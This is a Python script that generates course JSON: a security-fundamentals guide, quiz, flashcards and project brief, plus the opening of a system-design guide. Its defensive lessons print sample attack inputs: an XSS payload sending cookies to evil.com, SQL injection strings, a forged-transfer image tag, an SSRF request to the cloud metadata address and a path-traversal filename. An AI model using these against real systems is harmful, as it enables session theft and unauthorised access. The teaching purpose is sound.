"""
Batch 1: Security & System Design (Unit 11)
  - security-fundamentals (order 110)
  - system-design-fundamentals (order 111)
  - data-structures-advanced (order 112)
Run: python3 scripts/new_topics_batch1.py
"""
import json
from pathlib import Path

BASE = Path(__file__).parent.parent / "src/content/topics"


def write(folder, filename, data):
    out = BASE / folder / filename
    out.parent.mkdir(parents=True, exist_ok=True)
    if out.exists():
        existing = json.loads(out.read_text())
        if len(existing.get("questions", [])) >= 20:
            print(f"  SKIP {filename} (already complete)")
            return
    out.write_text(json.dumps(data, indent=2, ensure_ascii=False))
    print(f"  WROTE {filename}: q={len(data['questions'])} fc={len(data['flashcards'])} guide={len(data['guide'])} chars")


# ─── TOPIC 1: security-fundamentals ──────────────────────────────────────────

SECURITY_GUIDE = "\n".join([
    "# Security Fundamentals",
    "",
    "## Why Security Matters (Even for Backend Devs)",
    "",
    "In 2021, a Log4Shell vulnerability in a Java logging library allowed attackers to run",
    "arbitrary code on millions of servers worldwide. The fix needed one line — but developers",
    "who didn't understand the attack couldn't recognise it fast enough.",
    "",
    "Security is not a separate team's job. Every developer writes code that touches user data,",
    "handles authentication, and processes untrusted input. Understanding the most common attacks",
    "is the difference between shipping safe software and shipping a ticking bomb.",
    "",
    "```",
    "Attacker mindset vs Developer mindset:",
    "",
    "Developer: 'The user enters their email in this form field.'",
    "Attacker:  'What if I enter: admin@site.com\\'--  ?'",
    "           (SQL injection that bypasses login!)",
    "",
    "Developer: 'We store passwords in the database.'",
    "Attacker:  'Are they hashed? Which algorithm? Can I reverse them?'",
    "",
    "Security = thinking like an attacker while building like a developer.",
    "```",
    "",
    "---",
    "",
    "## OWASP Top 10 — The Most Common Web Vulnerabilities",
    "",
    "OWASP (Open Web Application Security Project) publishes a list of the top 10 most",
    "critical web security risks. Every developer should know all 10.",
    "",
    "```",
    "+----+--------------------------------+------------------------------------------+",
    "| #  | Vulnerability                  | One-line description                     |",
    "+----+--------------------------------+------------------------------------------+",
    "| A1 | Broken Access Control          | Users doing things they shouldn't        |",
    "| A2 | Cryptographic Failures         | Weak/missing encryption of sensitive data|",
    "| A3 | Injection (SQL, NoSQL, OS)     | Untrusted data interpreted as commands   |",
    "| A4 | Insecure Design                | Missing threat modelling, bad patterns   |",
    "| A5 | Security Misconfiguration      | Default passwords, open cloud buckets    |",
    "| A6 | Vulnerable Components          | Old libraries with known CVEs            |",
    "| A7 | Auth Failures                  | Weak passwords, session fixation         |",
    "| A8 | Software & Data Integrity      | Unsigned updates, compromised CI/CD      |",
    "| A9 | Logging & Monitoring Failures  | Can't detect or respond to breaches      |",
    "| A10| SSRF                           | Server makes requests to internal systems|",
    "+----+--------------------------------+------------------------------------------+",
    "```",
    "",
    "---",
    "",
    "## SQL Injection — The Classic Attack",
    "",
    "SQL injection happens when user input is concatenated directly into a SQL query.",
    "",
    "```",
    "VULNERABLE CODE (Java):",
    "  String query = \"SELECT * FROM users WHERE email='\" + email + \"' AND password='\" + pass + \"'\";",
    "",
    "Attacker enters email:    admin@site.com'--",
    "Resulting query:          SELECT * FROM users WHERE email='admin@site.com'--' AND password='...'",
    "                          -- is a SQL comment. Everything after it is IGNORED.",
    "                          Attack logs in as admin without the password!",
    "",
    "Even worse — attacker enters: ' OR '1'='1",
    "  SELECT * FROM users WHERE email='' OR '1'='1' AND password=''",
    "  '1'='1' is ALWAYS true. Returns ALL users. Attacker picks first (usually admin).",
    "",
    "FIX — Parameterised queries / Prepared statements:",
    "  // Java",
    "  PreparedStatement stmt = conn.prepareStatement(",
    "      \"SELECT * FROM users WHERE email=? AND password=?\");",
    "  stmt.setString(1, email);",
    "  stmt.setString(2, password);",
    "  // Parameters are NEVER interpreted as SQL — they're data only.",
    "",
    "  // Spring Data JPA — automatic parameterization:",
    "  @Query(\"SELECT u FROM User u WHERE u.email = :email\")",
    "  Optional<User> findByEmail(@Param(\"email\") String email);",
    "```",
    "",
    "**Rule: NEVER concatenate user input into SQL. Always use parameterised queries.**",
    "",
    "---",
    "",
    "## XSS — Cross-Site Scripting",
    "",
    "XSS happens when your app renders untrusted user content as HTML — allowing attackers",
    "to inject JavaScript that runs in other users' browsers.",
    "",
    "```",
    "SCENARIO: Comments section",
    "",
    "Attacker posts comment:",
    "  <script>document.location='https://evil.com/steal?c='+document.cookie</script>",
    "",
    "Vulnerable app renders it as HTML:",
    "  <div class='comment'>",
    "    <script>document.location='https://evil.com/steal?c='+document.cookie</script>",
    "  </div>",
    "",
    "Every other user who views this comment gets their session cookie stolen!",
    "Attacker can now log in AS those users.",
    "",
    "Types:",
    "  Stored XSS:   Malicious script saved in DB, served to all visitors (worst)",
    "  Reflected XSS: Script in URL parameter, reflected back in response",
    "  DOM XSS:      Client-side code writes attacker data to DOM without sanitisation",
    "",
    "FIXES:",
    "  1. Escape output — convert < to &lt;, > to &gt; before rendering",
    "  2. React/Angular escape by default (use dangerouslySetInnerHTML/[innerHTML] carefully!)",
    "  3. Content Security Policy header — browser refuses to run inline scripts",
    "  4. HttpOnly cookies — JS can't read them even if XSS succeeds",
    "",
    "CSP header example:",
    "  Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-abc123'",
    "  // Only scripts from same origin OR with matching nonce run",
    "```",
    "",
    "---",
    "",
    "## CSRF — Cross-Site Request Forgery",
    "",
    "```",
    "SCENARIO: You are logged into your bank. bank.com sets a session cookie.",
    "",
    "While still logged in, you visit evil.com which has:",
    "  <img src='https://bank.com/transfer?to=attacker&amount=10000'>",
    "",
    "Your browser sees an img tag, tries to load the URL.",
    "It automatically includes your bank.com session cookie.",
    "Bank receives the request — it looks legitimate (valid session cookie).",
    "Money transferred to attacker. You did nothing wrong.",
    "",
    "FIXES:",
    "  1. CSRF tokens — unique random token per form, verified server-side",
    "     <input type='hidden' name='_csrf' value='a8f3...'>",
    "     POST /transfer sends this token; server validates it matches session",
    "",
    "  2. SameSite cookies (modern fix):",
    "     Set-Cookie: sessionId=abc; SameSite=Strict",
    "     // Cookie NOT sent on cross-site requests. CSRF impossible.",
    "     SameSite=Lax (default): sent on top-level navigation (links), not sub-requests",
    "     SameSite=Strict: never sent cross-site",
    "",
    "  3. Check Origin/Referer header — reject requests from unexpected origins",
    "",
    "Spring Security adds CSRF protection automatically.",
    "Disable only for stateless APIs that use JWT (not cookies).",
    "```",
    "",
    "---",
    "",
    "## JWT — JSON Web Tokens",
    "",
    "```",
    "JWT is a compact, self-contained token for stateless authentication.",
    "",
    "Structure (3 base64-encoded parts separated by dots):",
    "  header.payload.signature",
    "",
    "Example (decoded):",
    "  Header:  { alg: 'HS256', typ: 'JWT' }",
    "  Payload: { sub: 'user123', role: 'admin', exp: 1714000000, iat: 1713990000 }",
    "  Signature: HMACSHA256(base64(header) + '.' + base64(payload), secretKey)",
    "",
    "How it works:",
    "  1. User logs in with email/password",
    "  2. Server verifies credentials, creates JWT signed with secret key",
    "  3. JWT returned to client (stored in memory or HttpOnly cookie)",
    "  4. Every subsequent request includes JWT in Authorization header:",
    "     Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...",
    "  5. Server verifies signature — no DB lookup needed (stateless!)",
    "",
    "Verify means:",
    "  Server recomputes signature with its secret key.",
    "  If it matches the signature in the token: token is authentic.",
    "  If someone tampers with the payload (changes role to 'admin'): signature fails.",
    "",
    "CRITICAL RULES:",
    "  - NEVER store JWT in localStorage (XSS can steal it)",
    "  - Store in HttpOnly cookie (JS cannot access it)",
    "  - Set short expiry (15 min access token) + refresh token (7 days)",
    "  - Use asymmetric keys (RS256) so services can verify without sharing secret",
    "  - Validate exp, iat, iss, aud claims",
    "",
    "JWT vs Session:",
    "  Session:    Stateful — server stores session, checks DB on every request",
    "  JWT:        Stateless — token is self-contained, no DB lookup needed",
    "  JWT scales: many servers can verify without shared session store",
    "  JWT risk:   Can't invalidate before expiry (logout doesn't destroy token)",
    "              Mitigate with short expiry + refresh token rotation",
    "```",
    "",
    "---",
    "",
    "## OAuth 2.0 — Delegated Authorization",
    "",
    "```",
    "PROBLEM: You use a 3rd party app (Trello) and want it to read your Google Calendar.",
    "  BAD approach: give Trello your Google password (now Trello has your password!)",
    "  GOOD approach: OAuth 2.0",
    "",
    "OAuth 2.0 flow (Authorization Code):",
    "",
    "  1. Trello redirects you to Google:",
    "     https://accounts.google.com/o/oauth2/v2/auth",
    "       ?client_id=trello-client-id",
    "       &redirect_uri=https://trello.com/callback",
    "       &scope=calendar.read",
    "       &response_type=code",
    "       &state=random-csrf-token",
    "",
    "  2. You log in to Google and consent to 'Trello wants to read Calendar'",
    "",
    "  3. Google redirects back to Trello with a short-lived authorization CODE:",
    "     https://trello.com/callback?code=4/abc123&state=random-csrf-token",
    "",
    "  4. Trello's backend exchanges code for access_token (secret exchange, server-to-server):",
    "     POST https://oauth2.googleapis.com/token",
    "     { code: '4/abc123', client_id: ..., client_secret: ..., grant_type: 'authorization_code' }",
    "     Response: { access_token: 'ya29...', expires_in: 3600, refresh_token: '...' }",
    "",
    "  5. Trello uses access_token to call Google Calendar API on your behalf",
    "",
    "Key points:",
    "  - Trello NEVER sees your Google password",
    "  - Access token is scoped (only calendar.read, not gmail, drive)",
    "  - Access token expires (usually 1 hour)",
    "  - Refresh token gets new access tokens without you re-logging in",
    "```",
    "",
    "---",
    "",
    "## Password Storage",
    "",
    "```",
    "WRONG (never do):     Store plain text password        MD5/SHA1 hash (fast = crackable)",
    "",
    "RIGHT:                bcrypt / Argon2 / scrypt",
    "",
    "Why bcrypt?",
    "  bcrypt is INTENTIONALLY SLOW. Each check takes ~100ms.",
    "  For users: 100ms is imperceptible.",
    "  For attackers brute-forcing: 100ms per guess = 10 guesses/second.",
    "  SHA1: billions of guesses per second on a GPU.",
    "  bcrypt: 10,000 guesses per second. Makes brute force 100,000x harder.",
    "",
    "  bcrypt hash includes the salt automatically:",
    "  $2a$12$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy",
    "   ^^  ^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^",
    "   alg cost            salt + hash (combined)",
    "  cost 12 = 2^12 = 4096 rounds",
    "",
    "Java Spring Security:",
    "  PasswordEncoder encoder = new BCryptPasswordEncoder(12);",
    "  String hash = encoder.encode(rawPassword);",
    "  boolean match = encoder.matches(rawPassword, storedHash);",
    "```",
    "",
    "---",
    "",
    "## HTTPS and TLS",
    "",
    "```",
    "HTTP:  Plain text. Anything between you and server can read it.",
    "HTTPS: Encrypted using TLS (Transport Layer Security).",
    "",
    "TLS Handshake (simplified):",
    "  1. Client: 'Hello, I support TLS 1.3, here are my cipher suites'",
    "  2. Server: 'I choose AES-256. Here is my certificate (public key).'",
    "  3. Client: verifies certificate against trusted CAs",
    "  4. Client: generates random session key, encrypts with server's public key",
    "  5. Server: decrypts with private key. Now both have same session key.",
    "  6. All subsequent communication encrypted with symmetric session key.",
    "",
    "Certificate: proves you're really talking to bank.com (not an impersonator)",
    "  Signed by a trusted Certificate Authority (Let's Encrypt, DigiCert)",
    "  Browser has list of trusted CAs built in",
    "",
    "HTTPS requirements for developers:",
    "  - Always HTTPS in production (never HTTP for sensitive data)",
    "  - HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomains",
    "    (tells browser: ONLY use HTTPS for this domain for 1 year)",
    "  - Redirect HTTP to HTTPS at load balancer/nginx",
    "  - Don't log sensitive data (passwords, tokens, card numbers)",
    "```",
    "",
    "---",
    "",
    "## Security Headers Cheatsheet",
    "",
    "```",
    "Header                          Purpose",
    "──────────────────────────────────────────────────────────────────────────",
    "Content-Security-Policy         Control which scripts/styles/images load",
    "Strict-Transport-Security       Force HTTPS for N seconds",
    "X-Frame-Options: DENY           Prevent clickjacking (embedding in iframe)",
    "X-Content-Type-Options: nosniff Browser must use declared content-type",
    "Referrer-Policy: no-referrer    Don't send full URL as referer",
    "Permissions-Policy              Disable camera/mic/geolocation",
    "```",
    "",
    "---",
    "",
    "## Mind Map",
    "",
    "```",
    "SECURITY FUNDAMENTALS",
    "|",
    "+-- OWASP TOP 10",
    "|   +-- A1: Broken Access Control",
    "|   +-- A3: Injection (SQL, XSS)",
    "|   +-- A7: Auth Failures",
    "|",
    "+-- INJECTION ATTACKS",
    "|   +-- SQL Injection -> parameterised queries",
    "|   +-- XSS          -> escape output, CSP, HttpOnly",
    "|   +-- CSRF          -> SameSite cookies, CSRF tokens",
    "|",
    "+-- AUTHENTICATION",
    "|   +-- JWT (stateless) vs Session (stateful)",
    "|   +-- OAuth 2.0 (delegated auth)",
    "|   +-- bcrypt password hashing",
    "|",
    "+-- TRANSPORT",
    "|   +-- HTTPS / TLS",
    "|   +-- HSTS",
    "|   +-- Security headers",
    "|",
    "+-- SECURE CODING RULES",
    "    +-- Never trust user input",
    "    +-- Parameterise all queries",
    "    +-- HttpOnly + SameSite cookies",
    "    +-- Short-lived tokens",
    "    +-- Principle of least privilege",
    "```",
    "",
    "---",
    "",
    "## How Security Connects to Other Topics",
    "",
    "- **Docker/K8s**: Run containers as non-root. Security contexts, secrets management.",
    "- **AWS**: IAM least privilege, S3 bucket policies, VPC security groups, KMS encryption.",
    "- **CI/CD**: Pipeline secrets must not be in code. Secret scanning, SAST tools.",
    "- **APIs/REST**: Always validate input, authenticate all endpoints, rate-limit.",
    "- **Databases**: Parameterised queries, encryption at rest, minimal DB user privileges.",
    "",
    "---",
    "",
    "## References and Further Learning",
    "",
    "### Videos",
    "- **Web Security in 100 Seconds + Full Course** by Fireship:",
    "  https://www.youtube.com/watch?v=iXSCFuXMgjg",
    "- **OWASP Top 10 Explained** by David Bombal:",
    "  https://www.youtube.com/watch?v=YqoxSzDzIG8",
    "",
    "### Articles",
    "- **OWASP Top 10**: https://owasp.org/www-project-top-ten/",
    "- **PortSwigger Web Security Academy** (free, hands-on labs): https://portswigger.net/web-security",
    "- **JWT.io** — decode and inspect JWTs: https://jwt.io",
    "",
    "### Practice",
    "- **DVWA** (Deliberately Vulnerable Web App): https://dvwa.co.uk/ — practice SQL injection, XSS safely",
    "- **PortSwigger labs** — browser-based labs, no setup needed",
])

SECURITY_Q = [
    {"id":"sec-q1","type":"mcq","prompt":"Which OWASP Top 10 category covers SQL injection, XSS, and OS command injection?",
     "choices":["A1: Broken Access Control","A3: Injection","A7: Authentication Failures","A5: Security Misconfiguration"],
     "answerIndex":1,"explanation":"Injection (A3) covers all cases where untrusted data is sent to an interpreter as part of a command or query — SQL, NoSQL, OS commands, LDAP, XSS.","tags":["owasp","injection"]},
    {"id":"sec-q2","type":"mcq","prompt":"A login form query is: SELECT * FROM users WHERE email='<input>'. Attacker enters email: admin'--. What happens?",
     "choices":["Query fails with syntax error","SQL comment (--) ignores the password check, logging in as admin with no password","Email validation blocks it","The ' is escaped automatically"],
     "answerIndex":1,"explanation":"-- is a SQL comment. Everything after it is ignored. The query becomes: SELECT * FROM users WHERE email='admin' — password check bypassed. Fix: use parameterised queries.","tags":["sql-injection","injection"]},
    {"id":"sec-q3","type":"mcq","prompt":"What is the correct fix for SQL injection?",
     "choices":["Validate input client-side","Escape special characters manually","Use parameterised queries / prepared statements — user input is never interpreted as SQL","Use stored procedures only"],
     "answerIndex":2,"explanation":"Parameterised queries separate code from data. The parameter placeholder (?) is never treated as SQL — it's always data. This fundamentally prevents SQL injection regardless of input content.","tags":["sql-injection","fix"]},
    {"id":"sec-q4","type":"mcq","prompt":"Stored XSS differs from Reflected XSS because:",
     "choices":["Stored XSS requires JavaScript","Stored XSS is saved in the database and served to ALL future visitors; Reflected XSS is in the URL and affects only users who click the link","Reflected XSS is more dangerous","They are identical"],
     "answerIndex":1,"explanation":"Stored XSS persists — one injection poisons all visitors. Reflected XSS needs the victim to click a crafted URL. Both are serious but stored XSS has higher blast radius.","tags":["xss","types"]},
    {"id":"sec-q5","type":"mcq","prompt":"Why should session cookies use HttpOnly flag?",
     "choices":["Makes cookies persist longer","Prevents JavaScript from reading the cookie — even if XSS succeeds, attacker JS cannot steal the session token","Encrypts the cookie value","HttpOnly makes it work on HTTP"],
     "answerIndex":1,"explanation":"HttpOnly tells the browser: 'This cookie is for HTTP requests only, not accessible via document.cookie.' If XSS injects script, it cannot read the session cookie. This breaks the most common XSS attack pattern.","tags":["xss","cookies","defense"]},
    {"id":"sec-q6","type":"mcq","prompt":"What is CSRF and what does SameSite=Strict cookie attribute do?",
     "choices":["CSRF is Cross-Site Scripting; SameSite blocks all cookies","CSRF is Cross-Site Request Forgery — tricking your browser into making requests to another site using your existing cookies. SameSite=Strict prevents the browser from sending cookies on any cross-site request.","CSRF is a clickjacking attack; SameSite prevents iframes","CSRF is a SQL attack; SameSite has no relation"],
     "answerIndex":1,"explanation":"CSRF exploits that browsers automatically attach cookies to all requests. SameSite=Strict tells the browser: only send this cookie when the request originates from the same site. Cross-site requests (the attacker's page) get no cookie. CSRF impossible.","tags":["csrf","cookies"]},
    {"id":"sec-q7","type":"mcq","prompt":"A JWT payload contains { role: 'user' }. Attacker changes it to { role: 'admin' } and sends the modified token. What happens?",
     "choices":["Server accepts it — role is now admin","Server rejects it — signature verification fails because payload was tampered","Server silently ignores role changes","Server logs a warning but proceeds"],
     "answerIndex":1,"explanation":"JWT signature covers the entire header + payload. Any change to the payload invalidates the signature. When the server re-computes the expected signature and compares, the mismatch reveals tampering. Token rejected.","tags":["jwt","authentication"]},
    {"id":"sec-q8","type":"mcq","prompt":"Why is storing JWT in localStorage dangerous?",
     "choices":["localStorage is too slow","Any JavaScript on the page (including injected XSS scripts) can read localStorage — token stolen via document.cookie-equivalent","localStorage is not persistent","CORS blocks localStorage JWT"],
     "answerIndex":1,"explanation":"localStorage is accessible by any JS on the page. XSS attack: inject one script that reads localStorage and sends it to evil.com. Token stolen. Use HttpOnly cookie — JS cannot access it.","tags":["jwt","xss","storage"]},
    {"id":"sec-q9","type":"mcq","prompt":"OAuth 2.0 Authorization Code flow: what does the 'code' returned to the redirect_uri represent?",
     "choices":["The access token","A short-lived one-time code that the app's backend exchanges server-to-server for the real access token","The user's identity","A refresh token"],
     "answerIndex":1,"explanation":"The code is a short-lived (10 seconds typically), one-use authorization code. The backend exchanges it privately (with client_secret) for the access token. The access token never appears in the browser URL. This protects it from browser history and logs.","tags":["oauth","authorization-code"]},
    {"id":"sec-q10","type":"mcq","prompt":"Why does bcrypt include a salt in the stored hash?",
     "choices":["To make the hash longer","A random salt means identical passwords produce different hashes — prevents rainbow table attacks and shows if two users have same password","To speed up verification","For base64 encoding"],
     "answerIndex":1,"explanation":"Without salt: everyone with password 'abc123' has the same hash. An attacker with a rainbow table (precomputed hash→password mapping) cracks all 'abc123' users at once. Salt makes every hash unique — rainbow tables useless.","tags":["passwords","hashing"]},
    {"id":"sec-q11","type":"mcq","prompt":"What is the Principle of Least Privilege?",
     "choices":["Use the minimum version of software","Every user/service/process should have only the permissions it actually needs to function — nothing extra","Admins should have no privileges","Least privilege only applies to databases"],
     "answerIndex":1,"explanation":"If your payment service only needs to read/write the orders table, don't give it full DB admin. If compromised, the blast radius is limited to what it had access to. Apply to: IAM roles, DB users, service accounts, OS processes.","tags":["access-control","principle"]},
    {"id":"sec-q12","type":"mcq","prompt":"What is the purpose of the Content-Security-Policy header?",
     "choices":["Encrypts page content","Limits where browser can load scripts, styles, images from — prevents XSS by blocking execution of injected scripts from external or inline sources","Controls HTTP version","Prevents CSRF"],
     "answerIndex":1,"explanation":"CSP is a browser-enforced whitelist of trusted content sources. Even if XSS injects an evil script, CSP prevents it from loading/running if it doesn't match the policy. A strong CSP is the strongest XSS mitigation.","tags":["xss","csp","headers"]},
    {"id":"sec-q13","type":"multi","prompt":"Which security practices protect against SQL injection? (Select all)",
     "choices":["Parameterised queries","Input validation","Using ORM (e.g., JPA/Hibernate)","Disabling database"],
     "answerIndexes":[0,1,2],"explanation":"Parameterised queries are the primary fix. Input validation (whitelist expected formats) adds defence-in-depth. ORMs use parameterised queries internally. Disabling DB is not practical.","tags":["sql-injection","defense"]},
    {"id":"sec-q14","type":"mcq","prompt":"What does HSTS (HTTP Strict Transport Security) header do?",
     "choices":["Enables HTTP/2","Tells the browser: only access this domain over HTTPS for the specified duration — prevents SSL stripping attacks","Adds basic auth","Controls cookie scope"],
     "answerIndex":1,"explanation":"HSTS prevents attackers from downgrading HTTPS to HTTP (SSL stripping). Browser receives max-age=31536000 and refuses to connect via HTTP for 1 year. Even if user types http://, browser auto-upgrades.","tags":["https","hsts","headers"]},
    {"id":"sec-q15","type":"mcq","prompt":"Broken Access Control (OWASP A1) example: user with role 'viewer' calls DELETE /users/42. Server deletes user. What was missing?",
     "choices":["Input validation","Server-side authorisation check — server trusted client-side role without verifying on the server the caller actually has delete permission","API rate limiting","TLS"],
     "answerIndex":1,"explanation":"Never trust client-side role/permission claims. Verify authorisation server-side on every request: 'Does THIS authenticated user have DELETE permission?' RBAC/ABAC enforced at backend, not just hidden UI buttons.","tags":["access-control","authorisation","owasp"]},
    {"id":"sec-q16","type":"mcq","prompt":"Why is MD5 unsuitable for password hashing in 2025?",
     "choices":["MD5 creates too many collisions","MD5 is fast — GPUs can compute billions of MD5 hashes per second, making brute force and rainbow table attacks trivial","MD5 is not available in Java","MD5 only works for file checksums"],
     "answerIndex":1,"explanation":"Speed is the enemy of password hashing. bcrypt/Argon2's intentional slowness (100ms+) makes brute force 10 million times harder than fast hashes. MD5's speed is a security liability for passwords.","tags":["passwords","hashing"]},
    {"id":"sec-q17","type":"mcq","prompt":"What is a refresh token in JWT-based auth? Why is it useful?",
     "choices":["A token that never expires","A long-lived token stored securely that can exchange for new short-lived access tokens without re-login — allows short access token expiry (15 min) without annoying users","A token that refreshes the page","Used only for password reset"],
     "answerIndex":1,"explanation":"Access tokens short expiry (15 min) limits damage if stolen. Refresh tokens (7 days, stored in HttpOnly cookie) silently get new access tokens. When refresh token expires, user must log in again. Rotation: each refresh issues a new refresh token and invalidates old one.","tags":["jwt","refresh-token","authentication"]},
    {"id":"sec-q18","type":"mcq","prompt":"SSRF (Server-Side Request Forgery) attack: attacker sends { url: 'http://169.254.169.254/latest/meta-data/' }. What is the risk?",
     "choices":["XSS via URL","The server fetches the URL — 169.254.169.254 is the AWS metadata endpoint that returns IAM credentials. Attacker gets your cloud credentials.","CSRF attack","SQL injection"],
     "answerIndex":1,"explanation":"If your app fetches user-supplied URLs, attackers can target internal services: AWS metadata (169.254.169.254), internal APIs, Redis on localhost:6379. Fix: validate/whitelist URLs, block internal IP ranges, use VPC firewall rules.","tags":["ssrf","owasp"]},
    {"id":"sec-q19","type":"mcq","prompt":"A user uploads an image. Your server saves it to /uploads/. Filename was: '../../../etc/passwd'. What is this attack?",
     "choices":["XSS via filename","Path traversal — attacker uses ../ to escape the intended directory and overwrite/read sensitive files","CSRF in form","SQL injection in filename"],
     "answerIndex":1,"explanation":"Path traversal (directory traversal) uses ../ sequences in filenames/paths to escape the intended directory. Fix: normalise and sanitise paths, use Path.resolve() and verify it starts with the expected base directory, use random UUIDs as filenames.","tags":["path-traversal","injection"]},
    {"id":"sec-q20","type":"mcq","prompt":"Why is it dangerous to log user passwords, even in error logs?",
     "choices":["Logs are too large","Logs are often stored in plain text, accessible to many engineers and log aggregation services — password in a log = immediate breach of that account, and users reuse passwords","Performance impact","GDPR only"],
     "answerIndex":1,"explanation":"Logs are accessed by many people and systems. A password in a log survives for months. Users reuse passwords — breach one, breach many. Never log: passwords, tokens, private keys, card numbers, SSNs. Mask PII in logs.","tags":["logging","security","pii"]},
]

SECURITY_FC = [
    {"id":"sec-fc1","front":"SQL Injection fix","back":"Use parameterised queries / prepared statements. Input is NEVER interpreted as SQL — only as data. PreparedStatement in Java, @Query with @Param in Spring, ORM automatically parameterises.","tags":["sql-injection"]},
    {"id":"sec-fc2","front":"XSS defense layers","back":"1. Escape output (< → &lt;) before rendering. 2. HttpOnly cookies (JS can't steal session). 3. Content-Security-Policy header (browser blocks injected scripts). 4. React/Angular escape by default — never use dangerouslySetInnerHTML with user input.","tags":["xss","defense"]},
    {"id":"sec-fc3","front":"CSRF fix — SameSite cookies","back":"Set-Cookie: session=abc; SameSite=Strict. Browser will NOT send this cookie on cross-site requests. Eliminates CSRF for modern browsers. For older: add CSRF token (random value in form, verified server-side).","tags":["csrf"]},
    {"id":"sec-fc4","front":"JWT — where to store it","back":"HttpOnly cookie: JS cannot read it. Safe from XSS. localStorage: readable by any JS. Vulnerable to XSS. Use HttpOnly + SameSite=Strict cookie. Short access token (15 min) + longer refresh token.","tags":["jwt","storage"]},
    {"id":"sec-fc5","front":"OAuth 2.0 Authorization Code flow","back":"1. Redirect to auth server with scope. 2. User consents. 3. Auth server returns short-lived code. 4. Backend exchanges code + client_secret for access_token (server-to-server). Access token never in URL.","tags":["oauth"]},
    {"id":"sec-fc6","front":"bcrypt cost factor","back":"Each +1 to cost doubles computation time. Cost 12 = 4096 rounds, ~100ms. Choose cost so hashing takes 100-300ms on your server. Re-evaluate yearly as hardware gets faster. Never MD5/SHA1 for passwords.","tags":["passwords","bcrypt"]},
    {"id":"sec-fc7","front":"OWASP Top 10 — top 3","back":"A1: Broken Access Control (verify authorisation server-side every request). A3: Injection (parameterise queries, escape output). A7: Auth Failures (bcrypt, account lockout, MFA). These three cover 60%+ of breaches.","tags":["owasp"]},
    {"id":"sec-fc8","front":"Security Headers must-haves","back":"HSTS: force HTTPS. CSP: control script/style sources. X-Frame-Options: DENY — prevent clickjacking. X-Content-Type-Options: nosniff. Set these in nginx/Spring Security/Express for every app.","tags":["headers","defense"]},
]

SECURITY_PROJ = {
    "brief": "You are building a REST API for a social platform with posts and comments. Users can register, log in, post content, and comment. Design the security architecture: authentication method, session management, input handling, and security headers. Identify which OWASP Top 10 risks apply and how you mitigate each.",
    "checklist": [
        {"id":"s1","text":"Authentication: use JWT with HttpOnly+SameSite cookie, 15 min access token + 7 day refresh token rotation","weight":20},
        {"id":"s2","text":"Password storage: bcrypt with cost 12. Never log passwords. Validate strength server-side.","weight":20},
        {"id":"s3","text":"Input: all DB queries use parameterised statements / JPA @Query. Post/comment content escaped before rendering.","weight":20},
        {"id":"s4","text":"Authorisation: verify user owns the resource server-side for every mutating request. No client trust.","weight":20},
        {"id":"s5","text":"Headers: HSTS, CSP, X-Frame-Options: DENY, X-Content-Type-Options: nosniff configured in Spring Security.","weight":20},
    ],
    "hints": [
        "Spring Security default CSRF protection works for form-based apps. For JWT APIs, disable CSRF (stateless = no session cookies to forge), add JWT filter instead.",
        "Check OWASP Testing Guide for each feature: https://owasp.org/www-project-testing-guide",
        "Swagger/OpenAPI: mark all endpoints with security schemes. Unauthenticated = 401, Unauthorised = 403.",
    ]
}

write("security", "security-fundamentals.json", {
    "id": "security-fundamentals",
    "unit": 11,
    "order": 110,
    "title": "Security Fundamentals",
    "summary": "OWASP Top 10, SQL injection, XSS, CSRF, JWT, OAuth 2.0, and secure coding practices every developer must know.",
    "prereqs": ["git-fundamentals"],
    "guide": SECURITY_GUIDE,
    "questions": SECURITY_Q,
    "flashcards": SECURITY_FC,
    "project": SECURITY_PROJ,
})

# ─── TOPIC 2: system-design-fundamentals ─────────────────────────────────────

SYSDESIGN_GUIDE = "\n".join([
    "# System Design Fundamentals",
    "",
    "## What Is System Design?",
    "",
    "System design is the process of defining the architecture, components, and interfaces",
    "of a system to satisfy specified requirements. It is the bridge between 'write code'",
    "and 'run a product serving millions of users'.",
    "",
    "A junior developer thinks: 'How do I write this function?'",
    "A senior developer thinks: 'How do I build this feature so it handles 1M users,",
    "recovers from failures, and can be maintained by 10 engineers?'",
    "",
    "```",
    "Interview: 'Design a URL shortener (like bit.ly)'",
    "",
    "Bad answer: 'I'd use a database with a table mapping short -> long URL.'",
    "",
    "Good answer structure:",
    "  1. Clarify requirements (read vs write ratio, geographic scale, SLA)",
    "  2. Estimate scale (QPS, storage, bandwidth)",
    "  3. High-level design (API, DB schema, core logic)",
    "  4. Deep dive (ID generation, caching, CDN, rate limiting)",
    "  5. Trade-offs discussed explicitly",
    "```",
    "",
    "---",
    "",
    "## The RESHADED Framework (System Design Interview Structure)",
    "",
    "```",
    "R - Requirements clarification",
    "E - Estimation (scale, storage, QPS)",
    "S - System interface (API design)",
    "H - High-level design",
    "A - Algorithm/Data design (core logic)",
    "D - Data store choice",
    "E - Extend (bottlenecks, improvements)",
    "D - Discussion of trade-offs",
    "```",
    "",
    "---",
    "",
    "## Scale Numbers to Memorise",
    "",
    "```",
    "LATENCY (approx):",
    "  L1 cache access:          0.5 ns",
    "  RAM access:               100 ns",
    "  SSD random read:          100 μs",
    "  Network (same DC):        500 μs",
    "  Network (cross-region):   50 ms",
    "  HDD seek:                 10 ms",
    "",
    "STORAGE:",
    "  1 char / 1 byte",
    "  1KB = 1,000 bytes",
    "  1MB = 1,000 KB",
    "  1GB = 1,000 MB",
    "  1TB = 1,000 GB",
    "  10M users × 1KB profile = 10GB",
    "  1B tweets/day × 300 bytes = 300GB/day = ~100TB/year",
    "",
    "QPS BENCHMARKS (rough per single server):",
    "  MySQL (simple query):     ~1,000 QPS",
    "  Redis (GET):              ~100,000 QPS",
    "  Static file server:       ~10,000 QPS",
    "  Application server:       ~1,000-10,000 QPS",
    "",
    "COMMON NUMBERS:",
    "  Twitter: 6,000 tweets/sec average, 150K peak",
    "  Facebook: 3B users, 500M posts/day",
    "  Netflix: 15% of world internet traffic",
    "```",
    "",
    "---",
    "",
    "## Case Study 1: URL Shortener (bit.ly)",
    "",
    "```",
    "REQUIREMENTS:",
    "  Functional: create short URL, redirect to original, optional expiry",
    "  Non-functional: low latency, high availability, no duplicates",
    "",
    "ESTIMATION:",
    "  100M URLs created/day = 1160/sec writes",
    "  10B redirects/day = 115,000/sec reads",
    "  Read:Write ratio = 100:1 (read-heavy)",
